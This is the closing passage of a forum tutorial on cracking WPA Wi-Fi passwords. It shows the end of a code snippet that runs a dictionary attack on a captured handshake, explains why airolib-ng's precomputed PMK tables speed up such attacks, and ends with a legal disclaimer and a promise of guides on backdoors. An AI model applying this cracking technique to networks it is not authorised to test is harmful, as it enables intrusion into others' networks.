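    wordlist = ["password", "BTHomeHub2", "sunflower7", "letmein"]
    return crack_handshake(precompute_pmks(ssid, wordlist), ap_mac, sta_mac, anonce, snonce, msg2)
```

    The split between precompute_pmks and crack_handshake is the whole point of airolib-ng: the PBKDF2 step costs 4096 HMACs per candidate and depends only on the ESSID, so a table built once can be replayed against every handshake captured from a network with that name, while the per-handshake work is four HMACs for the PTK plus one for the MIC.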


    Things to remember when training

    I will not take any responsibility for what you do if you use these tutorials for malicious use; if you get busted it's not my fault. I have written this guide for educational purposes and performed all attacks on my own local network and against my own router. Remember there are laws on cracking into networks and people's private information.

    Also, if you have any problems with these guides please contact me on the forums and I will try to help you sort them out. I have been cracking wireless keys for about 2 years now and trying to find new ways to attack them; these are only a few ways of doing it.

    This is more of an introduction to cracking wireless Internet, and I will be bringing some more guides out soon to show the sort of damage an attacker can do once he has a foothold in your network, or even a backdoor on one of your computers on the network, and how he can attack every computer on the network from a remote location.

    Thanks for reading; I hope you enjoyed it and learned something from it. I enjoyed writing it and re-performing old ways that I haven't done in a while.

    Shouts to pentest & qubit for being such good members and staff on the forums.

    Peace, Zero Cold